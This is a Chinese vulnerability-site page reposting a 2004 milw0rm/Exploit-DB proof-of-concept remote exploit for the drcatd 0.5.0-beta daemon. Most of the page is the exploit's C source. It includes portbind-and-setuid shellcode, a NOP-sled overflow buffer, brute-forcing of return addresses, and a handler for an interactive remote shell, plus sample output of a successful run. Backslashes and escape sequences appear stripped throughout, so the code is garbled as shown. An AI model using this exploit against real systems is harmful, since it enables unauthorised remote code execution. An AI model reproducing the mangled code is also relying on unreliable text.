Drcat 0.5.0-beta – ‘drcatd’ Remote Code Execution

Drcat 0.5.0-beta – ‘drcatd’ Remote Code Execution

漏洞ID 1054540 漏洞类型
发布时间 2004-07-22 更新时间 2004-07-22
图片[1]-Drcat 0.5.0-beta – ‘drcatd’ Remote Code Execution-安全小百科CVE编号 N/A
图片[2]-Drcat 0.5.0-beta – ‘drcatd’ Remote Code Execution-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/359
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*

Proof of Concept DRCATD Remote exploit
                               by Taif
__
Test:
[root@localhost drcat]# ./drcat -d 127.0.0.1 -u taif -p test
Public code by Taif
drcat-0.5.0-beta ('remote r00t' proof)
Bug found by Khan Shirani

host: +-+-+-+-+-+-+-+
      127.0.0.1 |C|L|U|P|C|S|R|
user: |O|O|S|A|O|E|O|
           taif |O|G|E|S|D|N|O|
password: |N|O|R|S|E|D|T|
           test | | | | | | | |
---------retaddr---+-+-+-+-+-+-+-+
       bfefc000 * * * * * * X
       bfefbfd1 * * * * * * X
       bfefbfa2 * * * * * * X
       bfefbf73 * * * * * * X
       bfefbf44 * * * * * * X
       bfefbf15 * * * * * * X
       bfefbee6 * * * * * * X
       bfefbeb7 * * * * * * X
       bfefbe88 * * * * * * X
       bfefbe59 * * * * * * X
       bfefbe2a * * * * * * X
       bfefbdfb * * * * * * X
       bfefbdcc * * * * * * X
       bfefbd9d * * * * * * X
       bfefbd6e * * * * * * X
       bfefbd3f * * * * * * X
       bfefbd10 * * * * * * X
       bfefbce1 * * * * * * X
       bfefbcb2 * * * * * * X
       bfefbc83 * * * * * * X
       bfefbc54 * * * * * * X
       bfefbc25 * * * * * * X
       bfefbbf6 * * * * * * X
       bfefbbc7 * * * * * * X
       bfefbb98 * * * * * * X
       bfefbb69 * * * * * * X
       bfefbb3a * * * * * * X
       bfefbb0b * * * * * * X
       bfefbadc * * * * * * X
       bfefbaad * * * * * * X
       bfefba7e * * * * * * X
       bfefba4f * * * * * * X
       bfefba20 * * * * * * X
       bfefb9f1 * * * * * * X
       bfefb9c2 * * * * * * X
       bfefb993 * * * * * * X
       bfefb964 * * * * * * X
       bfefb935 * * * * * * X
       bfefb906 * * * * * * X
       bfefb8d7 * * * * * * X
       bfefb8a8 * * * * * * X
       bfefb879 * * * * * * X
       bfefb84a * * * * * * X
       bfefb81b * * * * * * X
       bfefb7ec * * * * * * X
       bfefb7bd * * * * * * X
       bfefb78e * * * * * * X
       bfefb75f * * * * * * X
       bfefb730 * * * * * * X
       bfefb701 * * * * * * X
       bfefb6d2 * * * * * * X
       bfefb6a3 * * * * * * X
       bfefb674 * * * * * * X
       bfefb645 * * * * * * X
       bfefb616 * * * * * * X
       bfefb5e7 * * * * * * X
       bfefb5b8 * * * * * * X
       bfefb589 * * * * * * X
       bfefb55a * * * * * * X
       bfefb52b * * * * * * X
       bfefb4fc * * * * * * *
* HAVE FUN * HAVE FUN * HAVE FUN * HAVE FUN * HAVE FUN *
Linux localhost.localdomain 2.4.26 #9 P ?ec 2 09:20:29 CEST 2004 i686 athlon i386 GNU/Linux
uid=500(taif) gid=500(taif) groups=500(taif)
10:04pm up 1:00, 1 user, load average: 0.42, 0.35, 0.20
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
....


NOTE:
Use this on your own risk!!
This exploit is unnecessary!!
*/


#include <stdio.h>
#include <netdb.h>
#include <unistd.h>

#define MAXDATASIZE (1024 * 4)

/* Color Pallete ... i love colors;) */
#define YELLOW "E[33m"
#define GREEN "E[32m"
#define RED "E[31m"
#define RESTORE "E[0m"


#define PRINTGREEN(string) 
       printf("%s%s%s",GREEN,string,RESTORE); 
       fflush(stdout);

#define PRINTRED(string) 
       printf("%s%s%s",RED,string,RESTORE); 
       fflush(stdout);

#define PRINTYELLOW(string) 
       printf("%s%s%s",YELLOW,string,RESTORE); 
       fflush(stdout);

/* portbind 20000 (by bighawk) *
* +setuid() */
char code[] =
"x31xc0" /* xorl %eax,%eax */
"x31xdb" /* xorl %ebx,%ebx */
"xb0x17" /* movb $0x17,%al */
"xcdx80" /* int $0x80 */
"x31xdb" /* xor ebx, ebx */
"xf7xe3" /* mul ebx */
"xb0x66" /* mov al, 102 */
"x53" /* push ebx */
"x43" /* inc ebx */
"x53" /* push ebx */
"x43" /* inc ebx */
"x53" /* push ebx */
"x89xe1" /* mov ecx, esp */
"x4b" /* dec ebx */
"xcdx80" /* int 80h */
"x89xc7" /* mov edi, eax */
"x52" /* push edx */
"x66x68x4ex20"/* push word 8270 */
"x43" /* inc ebx */
"x66x53" /* push bx */
"x89xe1" /* mov ecx, esp */
"xb0xef" /* mov al, 239 */
"xf6xd0" /* not al */
"x50" /* push eax */
"x51" /* push ecx */
"x57" /* push edi */
"x89xe1" /* mov ecx, esp */
"xb0x66" /* mov al, 102 */
"xcdx80" /* int 80h */
"xb0x66" /* mov al, 102 */
"x43" /* inc ebx */
"x43" /* inc ebx */
"xcdx80" /* int 80h */
"x50" /* push eax */
"x50" /* push eax */
"x57" /* push edi */
"x89xe1" /* mov ecx, esp */
"x43" /* inc ebx */
"xb0x66" /* mov al, 102 */
"xcdx80" /* int 80h */
"x89xd9" /* mov ecx, ebx */
"x89xc3" /* mov ebx, eax */
"xb0x3f" /* mov al, 63 */
"x49" /* dec ecx */
"xcdx80" /* int 80h */
"x41" /* inc ecx */
"xe2xf8" /* loop lp */
"x51" /* push ecx */
"x68x6ex2fx73x68"/* push dword 68732f6eh */
"x68x2fx2fx62x69"/* push dword 69622f2fh */
"x89xe3" /* mov ebx, esp */
"x51" /* push ecx */
"x53" /* push ebx */
"x89xe1" /* mov ecx, esp */
"xb0xf4" /* mov al, 244 */
"xf6xd0" /* not al */
"xcdx80"; /* int 80h */

void banner()
{
fprintf(stderr,"Public code by Taif n"
              "drcat-0.5.0-beta ('remote r00t' proof)n"
              "Bug found by Khan Shirani nn");
}

void usage (char *progname)
{
int i;
fprintf (stderr, "usage: %s arguments nn"
                "-d hostanme (127.0.0.1) n"
                "-u user (NULL) n"
                "-p password (NULL) n"
                "-P port (3535) n"
                "-t timeout (1000=1s) (300) n"
                "n", progname);


exit (0);
}

int conn(char *ip,int port)
{
int sock;
struct hostent *host;
struct sockaddr_in addr;

if((host=gethostbyname(ip))==NULL)
 { PRINTRED("Xngethostbyname()n"); exit(1); }

addr.sin_family=AF_INET;
addr.sin_port=htons(port);
addr.sin_addr=*((struct in_addr *)host->h_addr);
memset(&(addr.sin_zero),0,8);


if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
 { PRINTRED("Xnsocket()n"); exit(1); }

if(connect(sock,(struct sockaddr *)&addr,sizeof(struct sockaddr))==-1)
 { PRINTRED("Xn"); return(-1);}

return(sock);
}

void login(int sock,char* user,char *pass)
{
char buffer[1024];
int n;

memset(buffer,0,sizeof(buffer));
n=recv(sock, buffer, 6, 0);
if(n<0) { PRINTRED("nrecv()n"); exit(1); }
if(n==6)
 {
 if(strcmp(buffer, "drcatd")) {PRINTYELLOW("* ");}
   else {PRINTGREEN("* ");};
 }
else {PRINTYELLOW("* ");}

if(send(sock, user, strlen(user), 0) == -1)
 {PRINTRED("nsend()n");close(sock);exit(1);}

n=recv(sock, buffer, 1, 0);
if(buffer[0] == '0')
 {
 PRINTRED("XnINVALID USERn");
 close(sock);
 exit(1);
 }
else {PRINTGREEN("* ")};

if(send(sock, pass, strlen(pass), 0) == -1)
 {PRINTRED("send()n");close(sock);exit(1);}

n=recv(sock, buffer, 1, 0);
 if(buffer[0] == '0')
 {
 PRINTRED("XnINVALID PASSWORDn");
 close(sock);
 exit(1);
 }
return;
}

/* change with care */
#define TOP 290

void makec0de(char* haox,unsigned int ret)
{
int i;

memset(haox,0,512);
memset(haox,0x90,TOP);
for (i=0;i<sizeof(code)-1;i++)
haox[TOP-sizeof(code)+i]=code[i];
/* yeah fucking thing (ret%4) */
for (i=TOP-(ret%4);i<504;i=i+4)
*(long *)&haox[i]=ret;
}

void send_it(int sock,char* buffer)
{
int len;

len=strlen(buffer);
if (send(sock, buffer, len, 0) == -1)
 {
 PRINTRED("Xnsend()n");
 close(sock);
 exit(1);
 }
return;
}

int sh(int sock)
{
char snd[1024], rcv[1024];
fd_set rset;
int maxfd, n;
int received = 0;

//strcpy(snd,"TERM=xterm; export TERM=xterm; exec bash -in");
//write(sock, snd, strlen(snd));

strcpy(snd, "uname -a; id; wn");
write(sock, snd, strlen(snd));

for (;;)
{
FD_SET(fileno(stdin), &rset);
FD_SET(sock, &rset);

maxfd = ( ( fileno(stdin) > sock )?fileno(stdin):sock ) + 1;
select(maxfd, &rset, NULL, NULL, NULL);

if (FD_ISSET(fileno(stdin), &rset))
 {
 bzero(snd, sizeof(snd));
 fgets(snd, sizeof(snd)-2, stdin);
 write(sock, snd, strlen(snd));
 }

if (FD_ISSET(sock, &rset))
 {
 bzero(rcv, sizeof(rcv));
 if ((n = read(sock, rcv, sizeof(rcv))) == -1)
   {
   printf("FUCK: Error in readn");
   exit(1);
   }
 if (!n)
   {
   if (!received)
     {
     printf("FUCK: failed.nn");
     return 0;
     }
   printf("Connection closed.n");
   exit(1);
   }

 received = 1;
 fputs(rcv, stdout);
 fflush(stdout);
 }
}
}

int main(int argc, char *argv[]){
char buff[MAXDATASIZE];
char *host, *user,*pass,c;
int sockfd,sockfd2;
int port = 3535;
int time = 300;
int ret=0xc0000000-(MAXDATASIZE*260);

host="127.0.0.1";
user=NULL;
pass=NULL;

banner();
if (argc<2) usage (argv[0]);

while((c=getopt(argc,argv,"?hd:u:p:P:t:"))!=-1)
       {
               switch(c)
               {
               case 't':
                               time=atoi(optarg);
                               break;
               case 'P':
                               port=atoi(optarg);
                               break;
               case 'u':
                               user=optarg;
                               break;
               case 'd':
                               host=optarg;
                               break;
               case 'p':
                               pass=optarg;
                               break;
               case '?':
               case 'h':
               default:
                               usage (argv[0]);
                               break;

               }
       }

if (host==NULL)
 {PRINTRED("Set host!n");usage (argv[0]);}
if (user==NULL)
 {PRINTRED("Set user!n");usage (argv[0]);}
if (pass==NULL)
 {PRINTRED("Set password!n");usage (argv[0]);}
 
printf(" host: +-+-+-+-+-+-+-+n"
      "%16s |C|L|U|P|C|S|R|n"
      " user: |O|O|S|A|O|E|O|n"
      "%16s |O|G|E|S|D|N|O|n"
      " password: |N|O|R|S|E|D|T|n"
      "%16s | | | | | | | |n"
      "---------retaddr---+-+-+-+-+-+-+-+n"
      ,host,user,pass);fflush(stdout);
while(1)
{
printf("%16x ",ret);fflush(stdout);
sockfd=conn(host,port);
if (sockfd<0) {PRINTRED("connect()n");exit(1);}
 else PRINTGREEN("* ");
login(sockfd,user,pass);PRINTGREEN("* ");
makec0de(buff,ret);PRINTGREEN("* ");
send_it(sockfd,buff);PRINTGREEN("* ");
close(sockfd);
usleep(time*1000);
sockfd=conn(host,20000);
if (!(sockfd<0))
 {
 PRINTGREEN("*n");
 PRINTGREEN("* HAVE FUN * HAVE FUN * HAVE FUN * HAVE FUN * HAVE FUN *n");
 sh(sockfd);
 close(sockfd);
 exit(0);
 }
ret=ret-((TOP-sizeof(code))/4);
}
exit(0);

}

// milw0rm.com [2004-07-22]

相关推荐: Gsview DSC缓冲区溢出漏洞

Gsview DSC缓冲区溢出漏洞 漏洞ID 1203681 漏洞类型 缓冲区溢出 发布时间 2002-10-28 更新时间 2002-10-28 CVE编号 CVE-2002-1223 CNNVD-ID CNNVD-200210-287 漏洞平台 N/A C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享